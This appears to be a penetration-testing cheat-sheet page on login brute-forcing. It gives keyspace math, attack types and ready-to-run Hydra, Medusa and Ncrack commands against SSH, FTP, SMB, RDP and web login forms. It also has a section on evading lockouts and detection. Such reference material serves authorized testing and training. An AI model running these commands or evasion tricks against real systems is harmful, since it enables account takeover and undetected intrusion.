Log-in Brute Forcing

Login brute-forcing is a systematic approach to discovering valid credentials by attempting numerous combinations against authentication systems. This technique uses computational power to test many possible username and password variations.

Mathematical Complexity

The total possible combinations in a brute force attack can be calculated as:

Possible Combinations = Character Set Size^Password Length

For example:

Lowercase letters only (26 characters): 26^8 = 208,827,064,576 combinations for an 8-character password
Lowercase + uppercase (52 characters): 52^8 = 53,459,728,531,456 combinations
Alphanumeric (62 characters): 62^8 = 218,340,105,584,896 combinations
Full ASCII printable (95 characters): 95^8 = 6,634,204,312,890,625 combinations

Attack Types

Dictionary Attack

Uses predefined lists of common usernames and passwords instead of generating all possibilities.

Hybrid Attack

Combines dictionary words with patterns, numbers, or special characters (e.g., password123, Password123!).

Rule-Based Attack

Applies transformation rules to dictionary words (capitalization, character substitution, etc.).

Credential Stuffing

Uses leaked credentials from other breaches to attempt access to different services.

Tools

Hydra

Hydra is a parallelized login cracker that supports numerous protocols.

Basic Syntax

hydra -L [username list] -P [password list] [target] [protocol] "[path]:[form parameters]:[failed login message]"

HTTP POST Form

hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials"

HTTP GET Form

hydra -L users.txt -P passwords.txt 10.10.10.10 http-get "/login.php:username=^USER^&password=^PASS^:Login failed"

SSH Brute Force

hydra -L users.txt -P passwords.txt ssh://10.10.10.10

FTP Brute Force

hydra -L users.txt -P passwords.txt ftp://10.10.10.10

SMB Brute Force

hydra -L users.txt -P passwords.txt smb://10.10.10.10

RDP Brute Force

hydra -L users.txt -P passwords.txt rdp://10.10.10.10

Additional Options

# Stop after first valid credential pair
hydra -L users.txt -P passwords.txt -f 10.10.10.10 service

# Set number of parallel tasks
hydra -L users.txt -P passwords.txt -t 4 10.10.10.10 service

# Verbose output
hydra -L users.txt -P passwords.txt -V 10.10.10.10 service

# Custom port
hydra -L users.txt -P passwords.txt -s 8080 10.10.10.10 http-post-form

Medusa

medusa -h [host] -U [username list] -P [password list] -M [module]

Ncrack

ncrack -U [username list] -P [password list] [target]:[port]

Defense Evasion

Rate Limiting

Space out login attempts to avoid triggering lockout policies:

hydra -L users.txt -P passwords.txt -t 1 -W 5 10.10.10.10 service

Targeted Usernames

Use validated usernames instead of large lists:

hydra -l admin -P passwords.txt 10.10.10.10 service

Custom User Agents

Use realistic user agents to avoid detection:

hydra -L users.txt -P passwords.txt http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

Best Practices

Always obtain proper authorization before performing brute force attacks
Document all testing activities
Use incremental approaches starting with targeted attempts before wider brute forcing
Monitor for account lockouts to prevent denial of service
Consider timing attacks to minimize impact on production systems

PreviousUpgrade Shells to Fully Interactive NextMedusa

Last updated 11 months ago

hashtagLogin Brute Forcing

hashtagMathematical Complexity

hashtagAttack Types

hashtagDictionary Attack

hashtagHybrid Attack

hashtagRule-Based Attack

hashtagCredential Stuffing

hashtagTools

hashtagHydra

hashtagMedusa

hashtagNcrack

hashtagDefense Evasion

hashtagRate Limiting

hashtagTargeted Usernames

hashtagCustom User Agents

hashtagBest Practices